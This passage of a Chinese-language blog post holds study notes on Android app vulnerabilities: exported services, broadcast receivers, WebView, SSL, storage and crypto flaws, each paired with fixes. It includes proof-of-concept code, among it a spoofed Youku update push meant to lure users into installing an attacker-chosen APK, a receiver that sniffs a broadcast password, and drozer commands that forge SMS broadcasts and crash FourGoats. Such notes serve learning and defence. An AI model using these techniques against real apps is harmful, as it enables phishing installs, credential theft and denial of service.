class="hljs-string">&quot;http://gdown.baidu.com/data/wisegame/41839d1d510870f4/jiecaojingxuan_51.apk&quot;</span>;<br>pushMsg.updatecontent = <span class="hljs-string">&quot;This is Fake&quot;</span>;<br> <br>Intent intent = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Intent()</span>;<br>intent.set<span class="hljs-constructor">ClassName(<span class="hljs-string">&quot;com.youku.phone&quot;</span>,<span class="hljs-string">&quot;com.youku.service.push.StartActivityService&quot;</span>)</span>;<br>intent.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;PushMsg&quot;</span>, <span class="hljs-params">pushMsg</span>)</span>;<br>start<span class="hljs-constructor">Service(<span class="hljs-params">intent</span>)</span>;<br> <br>其中PushMsg类不需要完整实现，只需要编译通过即可；<br><span class="hljs-number">2.</span>反编译优酷客户端的App得到smali代码，从中提取出<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PushMsg</span>.</span></span>smali；<br><span class="hljs-number">3.</span>反编译上述创建的APK文件，将原PushMsg类的smali文件替换为优酷中的<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">PushMsg</span>.</span></span>smali文件，重新打包签名；<br><span class="hljs-number">4.</span>安装并运行重打包后的APK，会看到优酷的升级页面触发，如果设计的好的话，是可以诱导用户安装攻击者指定的APK文件的。<br></code></pre></td></tr></table></figure>

<h3 id="拒绝服务攻击-1"><a href="#拒绝服务攻击-1" class="headerlink" title="拒绝服务攻击"></a>拒绝服务攻击</h3><p>同Activity</p>
<p><a target="_blank" rel="noopener" href="https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-048028"><strong>雪球最新Android客户端存在空指针异常及信息泄露漏洞</strong></a></p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs dockerfile">雪球客户端版本：<span class="hljs-number">4.1</span><br>adb <span class="hljs-keyword">shell</span><span class="bash"> 下执行下面命令，虚拟机将崩溃。愿意在于空指针调用</span><br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_N58T5GMF5RW6URH.png" srcset="/img/loading.gif" lazyload alt="image-20210908160946499"></p>
<h3 id="防护"><a href="#防护" class="headerlink" title="防护"></a>防护</h3><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">安全防护：<br>    （<span class="hljs-number">1</span>）私有service不定义<span class="hljs-built_in">int</span>ent-filter并且设置exported为<span class="hljs-literal">false</span><br>    （<span class="hljs-number">2</span>）公开的service设置exported为<span class="hljs-literal">true</span>，<span class="hljs-built_in">int</span>ent-filter可以定义或者不定义<br>    （<span class="hljs-number">3</span>）合作service需对合作方的app签名做校验<br>    （<span class="hljs-number">4</span>）只被应用本身使用的service应设置为私有<br>    （<span class="hljs-number">5</span>）service接收的数据需要谨慎处理<br>    （<span class="hljs-number">6</span>）内部service需要使用签名级别的protectionLevel来判断是否未内部应用调用<br>    （<span class="hljs-number">7</span>）不应在service创建（onCreate方法被调用）的时候决定是否提供服务，应在onStartCommand/onBind/onHandleIntent等方法被调用时做判断<br>    （<span class="hljs-number">8</span>）当service又返回数据的时候，因判断数据接收app是否又信息泄露的风险<br>    （<span class="hljs-number">9</span>）有明确的服务需调用时使用显示意图<br>    （<span class="hljs-number">10</span>）尽量不发送敏感信息<br>    （<span class="hljs-number">11</span>）启动Activity时不设置<span class="hljs-built_in">int</span>ent的FLAG_ACTIVITY_NEW_TASK标签<br></code></pre></td></tr></table></figure>



<h2 id="ContentProvider组件"><a href="#ContentProvider组件" class="headerlink" title="ContentProvider组件"></a>ContentProvider组件</h2><h2 id="BroadcastReceiver组件"><a href="#BroadcastReceiver组件" class="headerlink" title="BroadcastReceiver组件"></a>BroadcastReceiver组件</h2><p>参考学习：<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-269309.htm">https://bbs.pediy.com/thread-269309.htm</a></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><span class="hljs-bullet">1.</span> 广播机制分为广播发送者和广播接收者。<br><span class="hljs-bullet">2.</span> 应用场景<br><span class="hljs-code">			不同组件/不同应用之间进行通信、多线程通信、与Android系统通信</span><br><span class="hljs-code">3. 广播机制模型</span><br><span class="hljs-code">			使用了设计模式中的观察者模式，三个基本角色：消息订阅者/发布者，消息中心（AMS）</span><br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_MVZXUT6TBSK5KQU.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs less"><span class="hljs-selector-tag">4</span>. 广播机制流程：<br>		自定义广播接收者<span class="hljs-selector-tag">BroadcastReceiver</span><br>		广播接收者注册：静态注册(AndroidManifest.xml中的&lt;receiver&gt;),动态注册(代码中调用									registerReceiver)<br>		广播发送者定义和发送广播：本质是定义<span class="hljs-selector-tag">Intent</span>，发送广播通过<span class="hljs-selector-tag">sendBroadcast</span>()<br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_DKAPK7A6KRHKYMV.png" srcset="/img/loading.gif" lazyload alt="image-20210912150855995"></p>
<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_MXZ8UKX7KMT5VGQ.png" srcset="/img/loading.gif" lazyload alt="image-20210912150855995"></p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs stata">两种广播分类：<br>	1.标准广播和有序广播<br>	2.普通广播、系统广播、有序广播、粘性广播、<span class="hljs-keyword">App</span>应用内广播<br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_PX6UGEV9HMMWTBV.png" srcset="/img/loading.gif" lazyload alt="image-20210912155436267"></p>
<h3 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h3><p>案例1:</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">intent没有明确的接收者，恶意应用可注册接收者接收广播，如果存在敏感数据，则被窃取。<br>假如有应用广播只设置了action：<br>    public void test(View view) &#123;<br>        Intent s1 = <span class="hljs-keyword">new</span> <span class="hljs-constructor">Intent()</span>;<br>        s1.set<span class="hljs-constructor">Action(<span class="hljs-string">&quot;com.test.broadcast.receiver&quot;</span>)</span>;<br>        s1.put<span class="hljs-constructor">Extra(<span class="hljs-string">&quot;password&quot;</span>,<span class="hljs-string">&quot;s1lenc3&quot;</span>)</span>;<br>        s1.add<span class="hljs-constructor">Flags(0x1000000)</span>;<br>        send<span class="hljs-constructor">Broadcast(<span class="hljs-params">s1</span>)</span>;<br>    &#125;<br><br>我们可以编写攻击应用代码：<br>		public void on<span class="hljs-constructor">Receive(Context <span class="hljs-params">context</span>, Intent <span class="hljs-params">intent</span>)</span> &#123;<br>        String pwd = null;<br>        <span class="hljs-keyword">if</span>(intent.get<span class="hljs-constructor">Action()</span>.equals(<span class="hljs-string">&quot;com.test.broadcast.receiver&quot;</span>))&#123;<br>            pwd = intent.get<span class="hljs-constructor">StringExtra(<span class="hljs-string">&quot;password&quot;</span>)</span>;<br>        &#125;<br>        <span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">System</span>.</span></span>out.println(pwd);<br>    &#125;<br>    <br>    &lt;receiver android:name=<span class="hljs-string">&quot;.ReceiverTest&quot;</span> android:exported=<span class="hljs-string">&quot;true&quot;</span> android:enabled=<span class="hljs-string">&quot;true&quot;</span>&gt;<br>            &lt;intent-filter&gt;<br>                &lt;action android:name=<span class="hljs-string">&quot;com.test.broadcast.receiver&quot;</span>/&gt;<br>            &lt;/intent-filter&gt;<br>    &lt;/receiver&gt;<br><br>可使用本地广播方式修复：<br>		<span class="hljs-module-access"><span class="hljs-module"><span class="hljs-identifier">LocalBroadcastManager</span>.</span></span>get<span class="hljs-constructor">Instance(<span class="hljs-params">this</span>)</span>.send<span class="hljs-constructor">Broadcast(<span class="hljs-params">s1</span>)</span>;<br></code></pre></td></tr></table></figure>

<p>案例2：<a target="_blank" rel="noopener" href="https://wwws.nightwatchcybersecurity.com/2018/11/11/cve-2018-9581/">Android 操作系统中通过 RSSI 广播暴露敏感数据 （CVE-2018-9581)</a></p>
<h3 id="权限绕过"><a href="#权限绕过" class="headerlink" title="权限绕过"></a>权限绕过</h3><figure class="highlight qml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs qml">可以通过静态注册和动态注册两种方式注册广播接收器，动态注册的广播默认都是导出的，如果导出的BroadcastReceiver没有做权限控制，导致BroadcastReceiver组件可以接收一个外部可控的<span class="hljs-built_in">url</span>、或者其他命令，导致攻击者可以越权利用应用的一些特定功能，比如发送恶意广播、伪造消息、任意应用下载安装、打开钓鱼网站等<br></code></pre></td></tr></table></figure>

<p>案例1：<a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/bugs/wooyun-2012-09175.html">小米MIUI漏洞可能导致硬件资源消耗</a></p>
<p>案例2：<a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/bugs/wooyun-2014-084520.html">酷派最安全手机s6拨打电话权限绕过</a></p>
<p>案例3：<a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/bugs/wooyun-2014-084516.html">酷派最安全手机s6程序锁绕过</a></p>
<h3 id="消息伪造-1"><a href="#消息伪造-1" class="headerlink" title="消息伪造"></a>消息伪造</h3><figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs fortran">暴露的Receiver对外接收<span class="hljs-keyword">Intent</span>，如果构造恶意的消息放在<span class="hljs-keyword">Intent</span>中传输，被调用的Receiver接收可能产生安全隐患<br></code></pre></td></tr></table></figure>

<p>案例1：<a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/bugs/wooyun-2013-039801.html">百度云盘手机版钓鱼、信息泄露和代码执行高危漏洞三合一</a></p>
<h3 id="拒绝服务"><a href="#拒绝服务" class="headerlink" title="拒绝服务"></a>拒绝服务</h3><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">如果敏感的BroadcastReceiver没有设置相应的权限保护，很容易受到攻击。最常见的是拒绝服务攻击。拒绝服务攻击指的是，传递恶意畸形的<span class="hljs-built_in">int</span>ent数据给广播接收器，广播接收器无法处理异常导致crash。<br>拒绝服务攻击的危害视具体业务场景而定，比如一个安全防护产品的拒绝服务、锁屏应用的拒绝服务、支付进程的拒绝服务等危害就是巨大的。<br></code></pre></td></tr></table></figure>

<p>案例1：<a target="_blank" rel="noopener" href="https://wooyun.x10sec.org/static/bugs/wooyun-2013-042755.html">QQ手机管家拒绝服务漏洞</a></p>
<p>案例2：fourgoats.apk拒绝服务攻击崩溃</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs stylus">dz&gt; run app<span class="hljs-selector-class">.broadcast</span><span class="hljs-selector-class">.info</span> -<span class="hljs-selector-tag">a</span> org<span class="hljs-selector-class">.owasp</span><span class="hljs-selector-class">.goatdroid</span><span class="hljs-selector-class">.fourgoats</span><br>Package: org<span class="hljs-selector-class">.owasp</span><span class="hljs-selector-class">.goatdroid</span><span class="hljs-selector-class">.fourgoats</span><br>  org<span class="hljs-selector-class">.owasp</span><span class="hljs-selector-class">.goatdroid</span><span class="hljs-selector-class">.fourgoats</span><span class="hljs-selector-class">.broadcastreceivers</span><span class="hljs-selector-class">.SendSMSNowReceiver</span><br>    Permission: null<br></code></pre></td></tr></table></figure>

<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/image-20211203150903530.png" srcset="/img/loading.gif" lazyload alt="image-20211203150903530"></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs stylus">发送广播测试：<br>run app<span class="hljs-selector-class">.broadcast</span><span class="hljs-selector-class">.send</span> --action org<span class="hljs-selector-class">.owasp</span><span class="hljs-selector-class">.goatdroid</span><span class="hljs-selector-class">.fourgoats</span><span class="hljs-selector-class">.SOCIAL_SMS</span> --extra string phoneNumber <span class="hljs-number">111111</span> --extra string message s1lenc3<br>发送恶意广播，intent传入畸形数据或空数据：<br>run app<span class="hljs-selector-class">.broadcast</span><span class="hljs-selector-class">.send</span> --action org<span class="hljs-selector-class">.owasp</span><span class="hljs-selector-class">.goatdroid</span><span class="hljs-selector-class">.fourgoats</span><span class="hljs-selector-class">.SOCIAL_SMS</span><br>程序崩溃。<br></code></pre></td></tr></table></figure>

<h3 id="安全防护"><a href="#安全防护" class="headerlink" title="安全防护"></a>安全防护</h3><ul>
<li>私有广播接收器设置exported=false,并且不配置intent-filter。(私有广播接收器依然能接收到同UID的广播)。</li>
<li>对接收来的广播进行验证。</li>
<li>内部app之间的广播使用protectionLevel=signature验证其是否真是内部app。</li>
<li>返回结果时需注意接收app是否会泄露信息。</li>
<li>发送的广播包含敏感信息时需指定广播接收器，使用显示意图或者setPackage(String packageName)。</li>
<li>使用LocalBroadcastManager。</li>
</ul>
<h2 id="Intent-Scheme-URLs攻击"><a href="#Intent-Scheme-URLs攻击" class="headerlink" title="Intent Scheme URLs攻击"></a>Intent Scheme URLs攻击</h2><p>详情：在AndroidManifest.xml设置Scheme协议之后，可以通过浏览器打开对应的Activity。</p>
<p>危害：通过访问浏览器构造Intent语法唤醒app相应组件，可能导致拒绝服务甚至越权调用以及提权漏洞。</p>
<p>建议：对数据进行安全检查，配置category filter,添加android.intent.category.BROWSABLE方式规避风险。</p>
<h1 id="信息泄露漏洞"><a href="#信息泄露漏洞" class="headerlink" title="信息泄露漏洞"></a>信息泄露漏洞</h1><p>继续参考看雪大佬的系列文章学习：<a target="_blank" rel="noopener" href="https://bbs.pediy.com/thread-271122.htm">https://bbs.pediy.com/thread-271122.htm</a></p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">信息泄露首先要知道Android系统数据的几种存储方式：文件存储、SharedPreferences、网络存储、SQLite数据库、ContentProvider。下面对这几种存储方式进行介绍。<br></code></pre></td></tr></table></figure>

<h2 id="文件存储"><a href="#文件存储" class="headerlink" title="文件存储"></a>文件存储</h2><p>大佬给的图已经很清晰了。</p>
<p><img src="/2020/03/15/Android%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/905443_N7VN9HEHA24NXPF.png" srcset="/img/loading.gif" lazyload alt="image-20220102214434734"></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs awk">内部存储：<br>	 内部存储一般是在<span class="hljs-regexp">/data/</span>目录下，只有root后的手机可以访问这个文件夹，重点有以下几类文件夹：<br>	 	<span class="hljs-regexp">/data/</span>app/    这个文件夹存储手机上安装的apk文件<br>		<span class="hljs-regexp">/data/</span>data<span class="hljs-regexp">/包名/</span>share_prefs  存储对应的应用程序中的shareprefence存储文件<br>		<span class="hljs-regexp">/data/</span>data<span class="hljs-regexp">/包名/</span>cache    存储对应的应用程序中的cache缓存文件<br>		<span class="hljs-regexp">/data/</span>data<span class="hljs-regexp">/包名/</span>databases  存储对应的应用程序中的数据库文件<br>		<span class="hljs-regexp">/data/</span>data<span class="hljs-regexp">/包名/</span>files      存储对应的应用程序中的资源文件<br>	 上图中也有提到在代码中获取这些文件的API，在内部存储文件夹里，只能访问自己app的数据，并且app卸载后，这些文件数据也被删除。<br>外部存储：<br>	 外部存储分为私有目录和公有目录，公有目录任何程序都可以访问，应用卸载，数据不删除，私有目录只有自身可以访问，应用卸载，数据随之	 删除。<br>	 私有目录地址：<span class="hljs-regexp">/storage/</span>emulated<span class="hljs-regexp">/0/</span>Android<span class="hljs-regexp">/data/</span>packagename，可以直接通过Activity或Context进行调用API获取文件数			 据。.<span class="hljs-regexp">/cache文件夹下是应用的缓存文件，./</span>files下是存放应用的数据。<br>	 公有目录：<span class="hljs-regexp">/storage/</span>extSdCard<span class="hljs-regexp">/Android/</span>data<span class="hljs-regexp">/packagename/</span>files，公有目录需要申请读写权限，在AndroidManifest.xml文件		中进行注册，在代码中可通过Enviroment进行API调用来访问公有目录的文件。<br>	 &lt;uses-permission android:name=<span class="hljs-string">&quot;android.permission.WRITE_EXTERNAL_STORAGE&quot;</span> /&gt;<br>	 &lt;uses-permission android:name=<span class="hljs-string">&quot;android.permission.READ_EXTERNAL_STORAGE&quot;</span>/&gt;<br></code></pre></td></tr></table></figure>



<h2 id="SharedPreferences"><a href="#SharedPreferences" class="headerlink" title="SharedPreferences"></a>SharedPreferences</h2><p>​    SharedPreferences是一个轻量级的存储类，特别适合用于保存软件配置参数。（是用xml文件存放数据，文件存放在/data/data/pack</p>
<p>agename/shared_prefs目录下）。</p>
<ul>
<li><p>存储数据</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs reasonml"><span class="hljs-number">1</span>、使用Activity类的getSharedPreferences方法获得SharedPreferences对象；<br><span class="hljs-number">2</span>、使用SharedPreferences接口的edit获得SharedPreferences.Editor对象；<br><span class="hljs-number">3</span>、通过SharedPreferences.Editor接口的putXXX方法保存key-value对；<br><span class="hljs-number">4</span>、通过过SharedPreferences.Editor接口的commit方法保存key-value对。<br><br><span class="hljs-comment">//MODE_PRIVATE（默认）：只有当前的应用程序才能对文件进行读写</span><br>SharedPreferences sharedPreferences = get<span class="hljs-constructor">SharedPreferences(<span class="hljs-string">&quot;data&quot;</span>, MODE_PRIVATE)</span>;<br><span class="hljs-comment">//创建editor对象</span><br>SharedPreferences.Editor editor = sharedPreferences.edit<span class="hljs-literal">()</span>;<br>......<br><span class="hljs-comment">//写入数据</span><br>editor.put<span class="hljs-constructor">String(<span class="hljs-string">&quot;username&quot;</span>, <span class="hljs-params">value1</span>)</span>;<br>editor.put<span class="hljs-constructor">String(<span class="hljs-string">&quot;passwd&quot;</span>, <span class="hljs-params">value2</span>)</span>;<br><span class="hljs-comment">//提交保存</span><br>editor.commit<span class="hljs-literal">()</span>;<br><br></code></pre></td></tr></table></figure></li>
<li><p>读取数据</p>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">SharedPreferences pref = get<span class="hljs-constructor">SharedPreferences(<span class="hljs-string">&quot;data&quot;</span>,MODE_PRIVATE)</span>;<br>String name = pref.get<span class="hljs-constructor">String(<span class="hljs-string">&quot;username&quot;</span>)</span>;<br><span class="hljs-built_in">int</span> age = pref.get<span class="hljs-constructor">Int(<span class="hljs-string">&quot;number&quot;</span>)</span>;<br>boolean isExist = pref.get<span class="hljs-constructor">Boolean(<span class="hljs-string">&quot;isExist&quot;</span>)</span>;<br></code></pre></td></tr></table></figure></li>
</ul>
<h1 id="WebView组件及服务器通信相关的风险或漏洞"><a href="#WebView组件及服务器通信相关的风险或漏洞" class="headerlink" title="WebView组件及服务器通信相关的风险或漏洞"></a>WebView组件及服务器通信相关的风险或漏洞</h1><h2 id="webview存在本地Java接口"><a href="#webview存在本地Java接口" class="headerlink" title="webview存在本地Java接口"></a>webview存在本地Java接口</h2><p>详情：android的webview组件有一个非常特殊接口函数addJavascriptInterface，能实现本地java与js之间交互。</p>
<p>危害：targetSdkVersion小于17时，利用此接口可以远程执行任意代码。</p>
<p>建议：不使用此接口，使用注入javascript和第三方协议的替代方案。</p>
<h2 id="WebView组件远程代码执行（调用getClassLoader）"><a href="#WebView组件远程代码执行（调用getClassLoader）" class="headerlink" title="WebView组件远程代码执行（调用getClassLoader）"></a>WebView组件远程代码执行（调用getClassLoader）</h2><p>详情：targetSdkVersion小于17时，并在Context子类中使用addJavascriptInterface绑定this对象。</p>
<p>危害：通过调用getClassLoader绕过getClass方法的限制。</p>
<p>建议：targetSdkVersion大于17。</p>
<h2 id="WebView忽略SSL证书错误"><a href="#WebView忽略SSL证书错误" class="headerlink" title="WebView忽略SSL证书错误"></a>WebView忽略SSL证书错误</h2><p>详情：WebView调用onReceivedSslError方法时，直接执行handler.proceed()来忽略该证书错误。</p>
<p>危害：可能引起中间人攻击。</p>
<p>建议：不要重写onReceivedSslError方法，或者对错误进行业务判断。</p>
<h2 id="WebView启用访问文件数据"><a href="#WebView启用访问文件数据" class="headerlink" title="WebView启用访问文件数据"></a>WebView启用访问文件数据</h2><p>详情：setAllowFileAccess(true),可通过webview访问私有目录下的文件数据。</p>
<p>危害：此方法默认为true，绕过同源策略能够对私有目录文件进行访问，导致隐私泄漏。</p>
<p>建议：设置为false，禁止访问私有文件数据。</p>
<h2 id="SSL通信服务端-客户端检测信任任意证书"><a href="#SSL通信服务端-客户端检测信任任意证书" class="headerlink" title="SSL通信服务端/客户端检测信任任意证书"></a>SSL通信服务端/客户端检测信任任意证书</h2><p>详情：自定义SSL x509 TrustManager，重写checkServerTrusted/checkClientTrusted方法，方法内不做任何服务端的证书校验。</p>
<p>危害：中间人攻击。</p>
<p>建议：双端进行严格证书校验。</p>
<h2 id="HTTPS关闭主机名验证"><a href="#HTTPS关闭主机名验证" class="headerlink" title="HTTPS关闭主机名验证"></a>HTTPS关闭主机名验证</h2><p>详情：构造HttpCLient时，HostnameVerifier参数为ALLOW_ALL_HOSTNAME_VERIFIER或空。</p>
<p>危害：中间人攻击。</p>
<p>建议：加密通信被还原为明文通信。</p>
<h2 id="开放socket端口"><a href="#开放socket端口" class="headerlink" title="开放socket端口"></a>开放socket端口</h2><p>详情：App绑定端口进行监听，建立连接后可接收外部发送的数据。</p>
<p>危害：构造恶意数据对端口进行测试，对于绑定了0.0.0.0的app可发起远程攻击。</p>
<p>建议：绑定127.0.0.1，对接受数据进行校验检测。</p>
<h1 id="数据安全风险"><a href="#数据安全风险" class="headerlink" title="数据安全风险"></a>数据安全风险</h1><h2 id="数据存储"><a href="#数据存储" class="headerlink" title="数据存储"></a>数据存储</h2><h3 id="SD卡数据被第三方程序访问"><a href="#SD卡数据被第三方程序访问" class="headerlink" title="SD卡数据被第三方程序访问"></a>SD卡数据被第三方程序访问</h3><p>详情：存储在SD卡中的内容可以调用getExternalStorageDirectory访问。</p>
<p>建议：存储信息到私有目录，对敏感数据加密。</p>
<h3 id="全局File可读写漏洞-openFileOutput"><a href="#全局File可读写漏洞-openFileOutput" class="headerlink" title="全局File可读写漏洞-openFileOutput"></a>全局File可读写漏洞-openFileOutput</h3><p>详情：openFileOutput方法创建内部文件时，将文件设置了全局的可读权限MODE_WORLD_READABLE/MODE_WORLD_WRITEABLE。。</p>
<p>危害：恶意读取文件内容。</p>
<p>建议：确认是否存在敏感数据，删除全局可读/写属性。</p>
<h2 id="私有文件泄漏风险-getSharedPreferences"><a href="#私有文件泄漏风险-getSharedPreferences" class="headerlink" title="私有文件泄漏风险-getSharedPreferences"></a>私有文件泄漏风险-getSharedPreferences</h2><h3 id="配置文件可读可写"><a href="#配置文件可读可写" class="headerlink" title="配置文件可读可写"></a>配置文件可读可写</h3><p>详情：getSharedPreferences第二个参数为MODE_WORLD_READABLE 或MODE_WORLD_WRITEABLE。</p>
<p>危害：信息泄漏，篡改内容，影响程序正常运行。</p>
<p>建议：参数设置MODE_PRIVATE。禁止使用MODE_WORLD_READABLE ｜MODE_WORLD_WRITEABLE模式。</p>
<h2 id="数据加密"><a href="#数据加密" class="headerlink" title="数据加密"></a>数据加密</h2><h3 id="AES弱加密"><a href="#AES弱加密" class="headerlink" title="AES弱加密"></a>AES弱加密</h3><p>详情：使用“AES/ECB/NoPadding”或“AES/ECB/PKCS5padding”的模式。</p>
<p>危害：破解难度低。</p>
<p>建议：使用cbc或cfb加密模式。</p>
<h3 id="随机数不安全使用"><a href="#随机数不安全使用" class="headerlink" title="随机数不安全使用"></a>随机数不安全使用</h3><p>详情：调用SecureRandom类中的setSeed方法。</p>
<p>危害：生成的随机数具有确定性，存在被破解的可能性。</p>
<p>建议：使用/dev/urandom或/dev/random来初始化伪随机数生成器。</p>
<h3 id="AES-DES硬编码密钥"><a href="#AES-DES硬编码密钥" class="headerlink" title="AES/DES硬编码密钥"></a>AES/DES硬编码密钥</h3><p>详情：加密时采用硬编码在程序中。</p>
<p>危害：通过反编译获取密钥可以轻易揭秘APP通信数据。</p>
<p>建议：密钥加密存储或进行加解密运算。</p>
<h1 id="文件目录遍历类漏洞"><a href="#文件目录遍历类漏洞" class="headerlink" title="文件目录遍历类漏洞"></a>文件目录遍历类漏洞</h1><h2 id="Provider文件目录遍历"><a href="#Provider文件目录遍历" class="headerlink" title="Provider文件目录遍历"></a>Provider文件目录遍历</h2><p>详情：Provider被导出并且覆写了openFile方法，没有对Content Query Uri进行有效判断或过滤。</p>
<p>危害：利用openFile接口进行文件目录遍历，可达到访问任意可读文件的目的。</p>
<p>建议：不覆写openFile方法，对参数进行安全校验。</p>
<h2 id="unzip解压缩漏洞"><a href="#unzip解压缩漏洞" class="headerlink" title="unzip解压缩漏洞"></a>unzip解压缩漏洞</h2><p>详情：解压zip，使用getName获取压缩文件名后未进行校验。</p>
<p>危害：构造恶意zip文件，覆盖相应的的文件导致任意代码执行。</p>
<p>建议：解压文件时，判断是否有../特殊字符。</p>
<h1 id="文件格式解析类漏洞"><a href="#文件格式解析类漏洞" class="headerlink" title="文件格式解析类漏洞"></a>文件格式解析类漏洞</h1><h2 id="FFmpeg文件读取"><a href="#FFmpeg文件读取" class="headerlink" title="FFmpeg文件读取"></a>FFmpeg文件读取</h2><p>详情：使用了低版本的FFmpeg库进行视频解码。</p>
<p>危害：低版本可能存在本地文件读取漏洞，可以通过构造恶意文件获取本地文件内容。</p>
<p>建议：升级最新版。</p>
<h2 id="安卓“Janus”漏洞"><a href="#安卓“Janus”漏洞" class="headerlink" title="安卓“Janus”漏洞"></a>安卓“Janus”漏洞</h2><p>详情：在原始apk前部添加一个恶意的classes.dex文件（A文件），安卓系统在校验时计算了A文件的hash值，并以“classes.dex”为字符串作为key保存，然后计算原本的classes.dex（B文件），同样的key保存，之后将会覆盖A文件的hash值，系统认为apk没有被修改，完成安装，运行apk会优先执行文件A，忽略B。</p>
<p>危害：绕过安卓系统的signature scheme V1签名机制，进而直接对App进行篡改。</p>
<p>建议：禁止安装多个同名apk文件。</p>
<h1 id="内存堆栈类漏洞"><a href="#内存堆栈类漏洞" class="headerlink" title="内存堆栈类漏洞"></a>内存堆栈类漏洞</h1><h2 id="未使用编译器堆栈保护技术"><a href="#未使用编译器堆栈保护技术" class="headerlink" title="未使用编译器堆栈保护技术"></a>未使用编译器堆栈保护技术</h2><p>详情：stack canaries漏洞缓解技术，函数调用时，向栈帧内压入额外的canary随机数，栈溢出时，canary先被覆盖，之后才是ebp和返回地址。函数返回时，会将canary与.data副本的值进行比较，不相同，说明发生了栈溢出。</p>
<p>危害：发生栈溢出时系统不会对程序进行保护。</p>
<p>建议：使用NDK编译so时，在Android.mk文件中添加：LOCAL_CFLAGS := -Wall -O2 -U_FORTIFY_SOURCE -fstack-protector-all</p>
<h2 id="未使用地址空间随机化技术"><a href="#未使用地址空间随机化技术" class="headerlink" title="未使用地址空间随机化技术"></a>未使用地址空间随机化技术</h2><p>详情：PIE，地址随机分配。</p>
<p>危害：shellcode执行难度降低，攻击成功率增加。</p>
